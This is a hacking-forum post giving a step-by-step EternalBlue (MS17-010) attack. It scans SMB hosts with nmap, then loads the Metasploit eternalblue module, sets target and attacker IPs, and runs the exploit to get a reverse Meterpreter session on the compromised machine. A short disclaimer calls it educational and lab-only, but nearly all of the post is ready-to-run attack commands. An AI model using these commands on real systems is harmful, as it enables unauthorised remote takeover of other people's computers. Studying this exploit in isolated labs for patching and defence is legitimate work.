dEEpEst
☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
- Joined
- Mar 29, 2018
- Messages
- 13,861
- Solutions
- 4
- Reputation
- 27
- Reaction score
- 45,549
- Points
- 1,813
- Credits
- 55,350
7 Years of Service
56%
Important
Using exploits like EternalBlue in unauthorized environments or outside of a test lab may be illegal and can have serious consequences. This example is for educational purposes only in fully controlled environments such as isolated virtual machine labs. In no case am I responsible for its malicious use.
Step 1: Scanning the target
First, identify vulnerable devices on your local network.
Code:
nmap -p 445 --script=smb-vuln-ms17-010 <IP_TARGET>
This command uses an nmap script to detect if the MS17-010 vulnerability is present on the target device.
---
Step 2: Launch the exploit with Metasploit
1. Launch Metasploit on the attacking machine:
Code:
msfconsole
2. Load the exploit module /windows/smb/ms17_010_eternalblue:
Code:
use exploit/windows/smb/ms17_010_eternalblue
3. Set the IP address of the target (vulnerable machine):
Code:
set RHOST <IP_TARGET>
4. Set the attacker's IP address (machine where the session will be opened):
Code:
set LHOST <IP_ATTACKER>
5. Launch the exploit:
Code:
exploit
If the attack is successful, you will get a Meterpreter session, which allows you to interact with the compromised system.
Note: Please note that this vulnerability was detected in 2017 and all systems should supposedly be patched. Then you should try it on your system and apply the patch if you didn't.